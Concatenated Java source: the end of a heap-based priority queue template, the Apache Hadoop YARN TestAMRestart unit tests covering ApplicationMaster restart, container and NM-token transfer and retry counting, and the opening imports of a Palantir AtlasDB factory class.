swap(0, queueSize - 1);
queueSize--;
siftDown();
return value;
}
public void swap(int sv0, int sv1) {
int tmp = heapSv4.get(sv0);
heapSv4.set(sv0, heapSv4.get(sv1));
heapSv4.set(sv1, tmp);
}
public int compare(int leftIndex, int rightIndex) {
int sv1 = heapSv4.get(leftIndex);
int sv2 = heapSv4.get(rightIndex);
return doEval(sv1, sv2);
}
public abstract void doSetup(@Named("context") FragmentContext context, @Named("incoming") VectorContainer incoming, @Named("outgoing") RecordBatch outgoing);
public abstract int doEval(@Named("leftIndex") int leftIndex, @Named("rightIndex") int rightIndex);
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.yarn.server.resourcemanager.applicationsmanager;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import org.apache.hadoop.yarn.api.protocolrecords.AllocateResponse;
import org.apache.hadoop.yarn.api.protocolrecords.RegisterApplicationMasterResponse;
import org.apache.hadoop.yarn.api.records.ApplicationAccessType;
import org.apache.hadoop.yarn.api.records.ApplicationAttemptId;
import org.apache.hadoop.yarn.api.records.ApplicationId;
import org.apache.hadoop.yarn.api.records.Container;
import org.apache.hadoop.yarn.api.records.ContainerExitStatus;
import org.apache.hadoop.yarn.api.records.ContainerId;
import org.apache.hadoop.yarn.api.records.ContainerState;
import org.apache.hadoop.yarn.api.records.ContainerStatus;
import org.apache.hadoop.yarn.api.records.NMToken;
import org.apache.hadoop.yarn.api.records.ResourceRequest;
import org.apache.hadoop.yarn.conf.YarnConfiguration;
import org.apache.hadoop.yarn.server.api.protocolrecords.NMContainerStatus;
import org.apache.hadoop.yarn.server.resourcemanager.MockAM;
import org.apache.hadoop.yarn.server.resourcemanager.MockNM;
import org.apache.hadoop.yarn.server.resourcemanager.MockRM;
import org.apache.hadoop.yarn.server.resourcemanager.recovery.MemoryRMStateStore;
import org.apache.hadoop.yarn.server.resourcemanager.recovery.records.ApplicationStateData;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMApp;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppState;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttempt;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptState;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerState;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.AbstractYarnScheduler;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.ResourceScheduler;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerApplicationAttempt;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacityScheduler;
import org.apache.hadoop.yarn.util.ControlledClock;
import org.apache.hadoop.yarn.util.Records;
import org.apache.hadoop.yarn.util.SystemClock;
import org.junit.Assert;
import org.junit.Test;
public class TestAMRestart {
@Test(timeout = 30000)
public void testAMRestartWithExistingContainers() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 2);
MockRM rm1 = new MockRM(conf);
rm1.start();
RMApp app1 =
rm1.submitApp(200, "name", "user",
new HashMap<ApplicationAccessType, String>(), false, "default", -1,
null, "MAPREDUCE", false, true);
MockNM nm1 =
new MockNM("127.0.0.1:1234", 10240, rm1.getResourceTrackerService());
nm1.registerNode();
MockNM nm2 =
new MockNM("127.0.0.1:2351", 4089, rm1.getResourceTrackerService());
nm2.registerNode();
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
int NUM_CONTAINERS = 3;
// allocate NUM_CONTAINERS containers
am1.allocate("127.0.0.1", 1024, NUM_CONTAINERS,
new ArrayList<ContainerId>());
nm1.nodeHeartbeat(true);
// wait for containers to be allocated.
List<Container> containers =
am1.allocate(new ArrayList<ResourceRequest>(),
new ArrayList<ContainerId>()).getAllocatedContainers();
while (containers.size() != NUM_CONTAINERS) {
nm1.nodeHeartbeat(true);
containers.addAll(am1.allocate(new ArrayList<ResourceRequest>(),
new ArrayList<ContainerId>()).getAllocatedContainers());
Thread.sleep(200);
}
// launch the 2nd container, for testing running container transferred.
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 2, ContainerState.RUNNING);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
rm1.waitForState(nm1, containerId2, RMContainerState.RUNNING);
    // launch the 3rd container, for testing that a container allocated by the previous
    // attempt is completed by the next new attempt.
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 3, ContainerState.RUNNING);
ContainerId containerId3 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 3);
rm1.waitForState(nm1, containerId3, RMContainerState.RUNNING);
    // 4th container still in ACQUIRED state, for testing that an acquired container is
    // always killed.
ContainerId containerId4 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 4);
rm1.waitForState(nm1, containerId4, RMContainerState.ACQUIRED);
    // 5th container is in Allocated state, for testing that an allocated container is
    // always killed.
am1.allocate("127.0.0.1", 1024, 1, new ArrayList<ContainerId>());
nm1.nodeHeartbeat(true);
ContainerId containerId5 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 5);
rm1.waitForContainerAllocated(nm1, containerId5);
rm1.waitForState(nm1, containerId5, RMContainerState.ALLOCATED);
// 6th container is in Reserved state.
am1.allocate("127.0.0.1", 6000, 1, new ArrayList<ContainerId>());
ContainerId containerId6 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 6);
nm1.nodeHeartbeat(true);
SchedulerApplicationAttempt schedulerAttempt =
((AbstractYarnScheduler) rm1.getResourceScheduler())
.getCurrentAttemptForContainer(containerId6);
while (schedulerAttempt.getReservedContainers().isEmpty()) {
System.out.println("Waiting for container " + containerId6
+ " to be reserved.");
nm1.nodeHeartbeat(true);
Thread.sleep(200);
}
// assert containerId6 is reserved.
Assert.assertEquals(containerId6, schedulerAttempt.getReservedContainers()
.get(0).getContainerId());
// fail the AM by sending CONTAINER_FINISHED event without registering.
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am1.waitForState(RMAppAttemptState.FAILED);
    // wait for some time. The previous AM's running containers should still remain
    // in the scheduler even though the AM failed.
Thread.sleep(3000);
rm1.waitForState(nm1, containerId2, RMContainerState.RUNNING);
// acquired/allocated containers are cleaned up.
Assert.assertNull(rm1.getResourceScheduler().getRMContainer(containerId4));
Assert.assertNull(rm1.getResourceScheduler().getRMContainer(containerId5));
// wait for app to start a new attempt.
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// assert this is a new AM.
ApplicationAttemptId newAttemptId =
app1.getCurrentAppAttempt().getAppAttemptId();
Assert.assertFalse(newAttemptId.equals(am1.getApplicationAttemptId()));
// launch the new AM
RMAppAttempt attempt2 = app1.getCurrentAppAttempt();
nm1.nodeHeartbeat(true);
MockAM am2 = rm1.sendAMLaunched(attempt2.getAppAttemptId());
RegisterApplicationMasterResponse registerResponse =
am2.registerAppAttempt();
// Assert two containers are running: container2 and container3;
Assert.assertEquals(2, registerResponse.getContainersFromPreviousAttempts()
.size());
boolean containerId2Exists = false, containerId3Exists = false;
for (Container container : registerResponse
.getContainersFromPreviousAttempts()) {
if (container.getId().equals(containerId2)) {
containerId2Exists = true;
}
if (container.getId().equals(containerId3)) {
containerId3Exists = true;
}
}
Assert.assertTrue(containerId2Exists && containerId3Exists);
rm1.waitForState(app1.getApplicationId(), RMAppState.RUNNING);
    // complete the container by sending a container-complete event which has the earlier
    // attempt's attemptId
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 3, ContainerState.COMPLETE);
    // Even though the completed-container event for containerId3 was sent to the
    // earlier failed attempt, the new RMAppAttempt can still capture this container
    // info.
// completed containerId4 is also transferred to the new attempt.
RMAppAttempt newAttempt =
app1.getRMAppAttempt(am2.getApplicationAttemptId());
// 4 containers finished, acquired/allocated/reserved/completed.
waitForContainersToFinish(4, newAttempt);
boolean container3Exists = false, container4Exists = false, container5Exists =
false, container6Exists = false;
for(ContainerStatus status : newAttempt.getJustFinishedContainers()) {
if(status.getContainerId().equals(containerId3)) {
        // containerId3 is the container run by the previous attempt but finished by the
        // new attempt.
container3Exists = true;
}
if (status.getContainerId().equals(containerId4)) {
        // containerId4 is the acquired container killed by the previous attempt;
        // it is now in the new attempt's finished-container list.
container4Exists = true;
}
if (status.getContainerId().equals(containerId5)) {
// containerId5 is the Allocated container killed by previous failed attempt.
container5Exists = true;
}
if (status.getContainerId().equals(containerId6)) {
// containerId6 is the reserved container killed by previous failed attempt.
container6Exists = true;
}
}
Assert.assertTrue(container3Exists && container4Exists && container5Exists
&& container6Exists);
// New SchedulerApplicationAttempt also has the containers info.
rm1.waitForState(nm1, containerId2, RMContainerState.RUNNING);
// record the scheduler attempt for testing.
SchedulerApplicationAttempt schedulerNewAttempt =
((AbstractYarnScheduler) rm1.getResourceScheduler())
.getCurrentAttemptForContainer(containerId2);
// finish this application
MockRM.finishAMAndVerifyAppState(app1, rm1, nm1, am2);
    // the 2nd attempt releases the 1st attempt's running container when the
    // 2nd attempt finishes.
Assert.assertFalse(schedulerNewAttempt.getLiveContainers().contains(
containerId2));
    // containerId2 is released as well, so 5 containers have now finished.
System.out.println("New attempt's just finished containers: "
+ newAttempt.getJustFinishedContainers());
waitForContainersToFinish(5, newAttempt);
rm1.stop();
}
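  // Polls (100ms per iteration, up to 500 iterations) until the attempt reports the
  // expected number of just-finished containers.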
private void waitForContainersToFinish(int expectedNum, RMAppAttempt attempt)
throws InterruptedException {
int count = 0;
while (attempt.getJustFinishedContainers().size() != expectedNum
&& count < 500) {
Thread.sleep(100);
count++;
}
}
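  // NM tokens issued to earlier attempts should be transferred to a restarted AM
  // via RegisterApplicationMasterResponse#getNMTokensFromPreviousAttempts().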
@Test(timeout = 30000)
public void testNMTokensRebindOnAMRestart() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 3);
MockRM rm1 = new MockRM(conf);
rm1.start();
RMApp app1 =
rm1.submitApp(200, "myname", "myuser",
new HashMap<ApplicationAccessType, String>(), false, "default", -1,
null, "MAPREDUCE", false, true);
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
MockNM nm2 =
new MockNM("127.1.1.1:4321", 8000, rm1.getResourceTrackerService());
nm2.registerNode();
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
List<Container> containers = new ArrayList<Container>();
// nmTokens keeps track of all the nmTokens issued in the allocate call.
List<NMToken> expectedNMTokens = new ArrayList<NMToken>();
    // am1 allocates 2 containers on nm1,
    // looping until both containers have been assigned.
while (true) {
AllocateResponse response =
am1.allocate("127.0.0.1", 2000, 2,
new ArrayList<ContainerId>());
nm1.nodeHeartbeat(true);
containers.addAll(response.getAllocatedContainers());
expectedNMTokens.addAll(response.getNMTokens());
if (containers.size() == 2) {
break;
}
Thread.sleep(200);
System.out.println("Waiting for container to be allocated.");
}
// launch the container-2
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 2, ContainerState.RUNNING);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
rm1.waitForState(nm1, containerId2, RMContainerState.RUNNING);
// launch the container-3
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 3, ContainerState.RUNNING);
ContainerId containerId3 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 3);
rm1.waitForState(nm1, containerId3, RMContainerState.RUNNING);
// fail am1
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am1.waitForState(RMAppAttemptState.FAILED);
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// restart the am
MockAM am2 = MockRM.launchAM(app1, rm1, nm1);
RegisterApplicationMasterResponse registerResponse =
am2.registerAppAttempt();
rm1.waitForState(app1.getApplicationId(), RMAppState.RUNNING);
    // check that am2 gets the NM tokens issued to am1.
Assert.assertEquals(expectedNMTokens,
registerResponse.getNMTokensFromPreviousAttempts());
// am2 allocate 1 container on nm2
containers = new ArrayList<Container>();
while (true) {
AllocateResponse allocateResponse =
am2.allocate("127.1.1.1", 4000, 1,
new ArrayList<ContainerId>());
nm2.nodeHeartbeat(true);
containers.addAll(allocateResponse.getAllocatedContainers());
expectedNMTokens.addAll(allocateResponse.getNMTokens());
if (containers.size() == 1) {
break;
}
Thread.sleep(200);
System.out.println("Waiting for container to be allocated.");
}
nm1.nodeHeartbeat(am2.getApplicationAttemptId(), 2, ContainerState.RUNNING);
ContainerId am2ContainerId2 =
ContainerId.newContainerId(am2.getApplicationAttemptId(), 2);
rm1.waitForState(nm1, am2ContainerId2, RMContainerState.RUNNING);
// fail am2.
nm1.nodeHeartbeat(am2.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am2.waitForState(RMAppAttemptState.FAILED);
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// restart am
MockAM am3 = MockRM.launchAM(app1, rm1, nm1);
registerResponse = am3.registerAppAttempt();
rm1.waitForState(app1.getApplicationId(), RMAppState.RUNNING);
    // check that am3 gets the NM tokens from both am1 and am2.
List<NMToken> transferredTokens = registerResponse.getNMTokensFromPreviousAttempts();
Assert.assertEquals(2, transferredTokens.size());
Assert.assertTrue(transferredTokens.containsAll(expectedNMTokens));
rm1.stop();
}
  // AM container preemption, NM disk failure and an unhealthy NM
  // should not be counted towards the AM max retry count.
@Test(timeout = 100000)
public void testShouldNotCountFailureToMaxAttemptRetry() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
// explicitly set max-am-retry count as 1.
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 1);
conf.setBoolean(YarnConfiguration.RECOVERY_ENABLED, true);
conf.set(YarnConfiguration.RM_STORE, MemoryRMStateStore.class.getName());
MemoryRMStateStore memStore = new MemoryRMStateStore();
memStore.init(conf);
MockRM rm1 = new MockRM(conf, memStore);
rm1.start();
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
RMApp app1 = rm1.submitApp(200);
RMAppAttempt attempt1 = app1.getCurrentAppAttempt();
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
CapacityScheduler scheduler =
(CapacityScheduler) rm1.getResourceScheduler();
ContainerId amContainer =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
// Preempt the first attempt;
scheduler.killContainer(scheduler.getRMContainer(amContainer));
am1.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt1.shouldCountTowardsMaxAttemptRetry());
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
ApplicationStateData appState =
memStore.getState().getApplicationState().get(app1.getApplicationId());
// AM should be restarted even though max-am-attempt is 1.
MockAM am2 =
rm1.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 2, nm1);
RMAppAttempt attempt2 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt2).mayBeLastAttempt());
// Preempt the second attempt.
ContainerId amContainer2 =
ContainerId.newContainerId(am2.getApplicationAttemptId(), 1);
scheduler.killContainer(scheduler.getRMContainer(amContainer2));
am2.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt2.shouldCountTowardsMaxAttemptRetry());
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
MockAM am3 =
rm1.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 3, nm1);
RMAppAttempt attempt3 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt3).mayBeLastAttempt());
// mimic NM disk_failure
ContainerStatus containerStatus = Records.newRecord(ContainerStatus.class);
containerStatus.setContainerId(attempt3.getMasterContainer().getId());
containerStatus.setDiagnostics("mimic NM disk_failure");
containerStatus.setState(ContainerState.COMPLETE);
containerStatus.setExitStatus(ContainerExitStatus.DISKS_FAILED);
Map<ApplicationId, List<ContainerStatus>> conts =
new HashMap<ApplicationId, List<ContainerStatus>>();
conts.put(app1.getApplicationId(),
Collections.singletonList(containerStatus));
nm1.nodeHeartbeat(conts, true);
am3.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt3.shouldCountTowardsMaxAttemptRetry());
Assert.assertEquals(ContainerExitStatus.DISKS_FAILED,
appState.getAttempt(am3.getApplicationAttemptId())
.getAMContainerExitStatus());
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
MockAM am4 =
rm1.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 4, nm1);
RMAppAttempt attempt4 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt4).mayBeLastAttempt());
// create second NM, and register to rm1
MockNM nm2 =
new MockNM("127.0.0.1:2234", 8000, rm1.getResourceTrackerService());
nm2.registerNode();
    // nm1 heartbeats to report itself as unhealthy.
    // This will result in ContainerExitStatus.ABORTED for the AM container.
nm1.nodeHeartbeat(false);
am4.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt4.shouldCountTowardsMaxAttemptRetry());
Assert.assertEquals(ContainerExitStatus.ABORTED,
appState.getAttempt(am4.getApplicationAttemptId())
.getAMContainerExitStatus());
// launch next AM in nm2
nm2.nodeHeartbeat(true);
MockAM am5 =
rm1.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 5, nm2);
RMAppAttempt attempt5 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt5).mayBeLastAttempt());
// fail the AM normally
    nm2.nodeHeartbeat(am5.getApplicationAttemptId(), 1,
        ContainerState.COMPLETE);
am5.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(attempt5.shouldCountTowardsMaxAttemptRetry());
// AM should not be restarted.
rm1.waitForState(app1.getApplicationId(), RMAppState.FAILED);
Assert.assertEquals(5, app1.getAppAttempts().size());
rm1.stop();
}
  // Test RM restart after the AM container is preempted: the new RM should not
  // count the AM preemption failure towards the max-retry-count and should be
  // able to re-launch the AM.
@Test(timeout = 20000)
public void testPreemptedAMRestartOnRMRestart() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
conf.setBoolean(YarnConfiguration.RECOVERY_ENABLED, true);
conf.set(YarnConfiguration.RM_STORE, MemoryRMStateStore.class.getName());
// explicitly set max-am-retry count as 1.
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 1);
MemoryRMStateStore memStore = new MemoryRMStateStore();
memStore.init(conf);
MockRM rm1 = new MockRM(conf, memStore);
rm1.start();
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
RMApp app1 = rm1.submitApp(200);
RMAppAttempt attempt1 = app1.getCurrentAppAttempt();
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
CapacityScheduler scheduler =
(CapacityScheduler) rm1.getResourceScheduler();
ContainerId amContainer =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
// Forcibly preempt the am container;
scheduler.killContainer(scheduler.getRMContainer(amContainer));
am1.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt1.shouldCountTowardsMaxAttemptRetry());
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// state store has 1 attempt stored.
ApplicationStateData appState =
memStore.getState().getApplicationState().get(app1.getApplicationId());
Assert.assertEquals(1, appState.getAttemptCount());
// attempt stored has the preempted container exit status.
Assert.assertEquals(ContainerExitStatus.PREEMPTED,
appState.getAttempt(am1.getApplicationAttemptId())
.getAMContainerExitStatus());
// Restart rm.
MockRM rm2 = new MockRM(conf, memStore);
nm1.setResourceTrackerService(rm2.getResourceTrackerService());
nm1.registerNode();
rm2.start();
// Restarted RM should re-launch the am.
MockAM am2 =
rm2.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 2, nm1);
MockRM.finishAMAndVerifyAppState(app1, rm2, nm1, am2);
RMAppAttempt attempt2 =
rm2.getRMContext().getRMApps().get(app1.getApplicationId())
.getCurrentAppAttempt();
Assert.assertTrue(attempt2.shouldCountTowardsMaxAttemptRetry());
Assert.assertEquals(ContainerExitStatus.INVALID,
appState.getAttempt(am2.getApplicationAttemptId())
.getAMContainerExitStatus());
rm1.stop();
rm2.stop();
}
  // Test regular RM restart/failover: the new RM should not count
  // the AM failure towards the max-retry-count and should be able to
  // re-launch the AM.
@Test(timeout = 50000)
public void testRMRestartOrFailoverNotCountedForAMFailures()
throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
conf.setBoolean(YarnConfiguration.RECOVERY_ENABLED, true);
conf.set(YarnConfiguration.RM_STORE, MemoryRMStateStore.class.getName());
// explicitly set max-am-retry count as 1.
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 1);
MemoryRMStateStore memStore = new MemoryRMStateStore();
memStore.init(conf);
MockRM rm1 = new MockRM(conf, memStore);
rm1.start();
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
RMApp app1 = rm1.submitApp(200);
// AM should be restarted even though max-am-attempt is 1.
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
RMAppAttempt attempt1 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt1).mayBeLastAttempt());
// Restart rm.
MockRM rm2 = new MockRM(conf, memStore);
rm2.start();
ApplicationStateData appState =
memStore.getState().getApplicationState().get(app1.getApplicationId());
// re-register the NM
nm1.setResourceTrackerService(rm2.getResourceTrackerService());
NMContainerStatus status = Records.newRecord(NMContainerStatus.class);
    status.setContainerExitStatus(
        ContainerExitStatus.KILLED_BY_RESOURCEMANAGER);
status.setContainerId(attempt1.getMasterContainer().getId());
status.setContainerState(ContainerState.COMPLETE);
status.setDiagnostics("");
nm1.registerNode(Collections.singletonList(status), null);
rm2.waitForState(attempt1.getAppAttemptId(), RMAppAttemptState.FAILED);
Assert.assertEquals(ContainerExitStatus.KILLED_BY_RESOURCEMANAGER,
appState.getAttempt(am1.getApplicationAttemptId())
.getAMContainerExitStatus());
// Will automatically start a new AppAttempt in rm2
rm2.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
MockAM am2 =
rm2.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 2, nm1);
MockRM.finishAMAndVerifyAppState(app1, rm2, nm1, am2);
RMAppAttempt attempt3 =
rm2.getRMContext().getRMApps().get(app1.getApplicationId())
.getCurrentAppAttempt();
Assert.assertTrue(attempt3.shouldCountTowardsMaxAttemptRetry());
Assert.assertEquals(ContainerExitStatus.INVALID,
appState.getAttempt(am2.getApplicationAttemptId())
.getAMContainerExitStatus());
rm1.stop();
rm2.stop();
}
@Test (timeout = 50000)
public void testRMAppAttemptFailuresValidityInterval() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
conf.setBoolean(YarnConfiguration.RECOVERY_ENABLED, true);
conf.set(YarnConfiguration.RM_STORE, MemoryRMStateStore.class.getName());
// explicitly set max-am-retry count as 2.
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 2);
MemoryRMStateStore memStore = new MemoryRMStateStore();
memStore.init(conf);
MockRM rm1 = new MockRM(conf, memStore);
rm1.start();
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
    // set the window size to a larger number: 20s.
    // we will verify that the app is failed if
    // two consecutive attempts fail within 20s.
RMApp app = rm1.submitApp(200, 20000);
MockAM am = MockRM.launchAM(app, rm1, nm1);
// Fail current attempt normally
nm1.nodeHeartbeat(am.getApplicationAttemptId(),
1, ContainerState.COMPLETE);
am.waitForState(RMAppAttemptState.FAILED);
// launch the second attempt
rm1.waitForState(app.getApplicationId(), RMAppState.ACCEPTED);
Assert.assertEquals(2, app.getAppAttempts().size());
Assert.assertTrue(((RMAppAttemptImpl) app.getCurrentAppAttempt())
.mayBeLastAttempt());
MockAM am_2 = MockRM.launchAndRegisterAM(app, rm1, nm1);
am_2.waitForState(RMAppAttemptState.RUNNING);
nm1.nodeHeartbeat(am_2.getApplicationAttemptId(),
1, ContainerState.COMPLETE);
am_2.waitForState(RMAppAttemptState.FAILED);
// current app should be failed.
rm1.waitForState(app.getApplicationId(), RMAppState.FAILED);
ControlledClock clock = new ControlledClock(new SystemClock());
// set window size to 6s
    RMAppImpl app1 = (RMAppImpl) rm1.submitApp(200, 6000);
app1.setSystemClock(clock);
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
// Fail attempt1 normally
nm1.nodeHeartbeat(am1.getApplicationAttemptId(),
1, ContainerState.COMPLETE);
am1.waitForState(RMAppAttemptState.FAILED);
// launch the second attempt
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
Assert.assertEquals(2, app1.getAppAttempts().size());
RMAppAttempt attempt2 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt2).mayBeLastAttempt());
MockAM am2 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
am2.waitForState(RMAppAttemptState.RUNNING);
    // advance the clock by 6 seconds
clock.setTime(System.currentTimeMillis() + 6*1000);
// Fail attempt2 normally
nm1.nodeHeartbeat(am2.getApplicationAttemptId(),
1, ContainerState.COMPLETE);
am2.waitForState(RMAppAttemptState.FAILED);
// can launch the third attempt successfully
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
Assert.assertEquals(3, app1.getAppAttempts().size());
RMAppAttempt attempt3 = app1.getCurrentAppAttempt();
clock.reset();
MockAM am3 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
am3.waitForState(RMAppAttemptState.RUNNING);
// Restart rm.
@SuppressWarnings("resource")
MockRM rm2 = new MockRM(conf, memStore);
rm2.start();
// re-register the NM
nm1.setResourceTrackerService(rm2.getResourceTrackerService());
NMContainerStatus status = Records.newRecord(NMContainerStatus.class);
    status.setContainerExitStatus(
        ContainerExitStatus.KILLED_BY_RESOURCEMANAGER);
status.setContainerId(attempt3.getMasterContainer().getId());
status.setContainerState(ContainerState.COMPLETE);
status.setDiagnostics("");
nm1.registerNode(Collections.singletonList(status), null);
rm2.waitForState(attempt3.getAppAttemptId(), RMAppAttemptState.FAILED);
rm2.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
    // Launch attempt 4
MockAM am4 =
rm2.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 4, nm1);
    // advance the clock by 6 seconds
clock.setTime(System.currentTimeMillis() + 6*1000);
// Fail attempt4 normally
    nm1.nodeHeartbeat(am4.getApplicationAttemptId(), 1,
        ContainerState.COMPLETE);
am4.waitForState(RMAppAttemptState.FAILED);
// can launch the 5th attempt successfully
rm2.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
MockAM am5 =
rm2.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 5, nm1);
clock.reset();
am5.waitForState(RMAppAttemptState.RUNNING);
// Fail attempt5 normally
    nm1.nodeHeartbeat(am5.getApplicationAttemptId(), 1,
        ContainerState.COMPLETE);
am5.waitForState(RMAppAttemptState.FAILED);
rm2.waitForState(app1.getApplicationId(), RMAppState.FAILED);
rm1.stop();
rm2.stop();
}
}
|
|
/**
* Copyright 2015 Palantir Technologies
*
* Licensed under the BSD-3 License (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://opensource.org/licenses/BSD-3-Clause
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.palantir.atlasdb.factory;
import java.util.ServiceLoader;
import java.util.Set;
import javax.net.ssl.SSLSocketFactory;
import org.immutables.value.Value;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import com.google.common.base.Function;
import com.google.common.base.Optional;
import com.google.common.base.Supplier;
import com.google.common.base.Suppliers;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableSet;
import com.palantir.atlasdb.cleaner.Cleaner;
import com.palantir.atlasdb.cleaner.CleanupFollower;
import com.palantir.atlasdb.cleaner.DefaultCleanerBuilder;
import com.palantir.atlasdb.cleaner.Follower;
import com.palantir.atlasdb.config.AtlasDbConfig;
import com.palantir.atlasdb.config.ServerListConfig;
import com.palantir.atlasdb.http.AtlasDbHttpClients;
import com.palantir.atlasdb.keyvalue.api.KeyValueService;
import com.palantir.atlasdb.keyvalue.impl.NamespacedKeyValueServices;
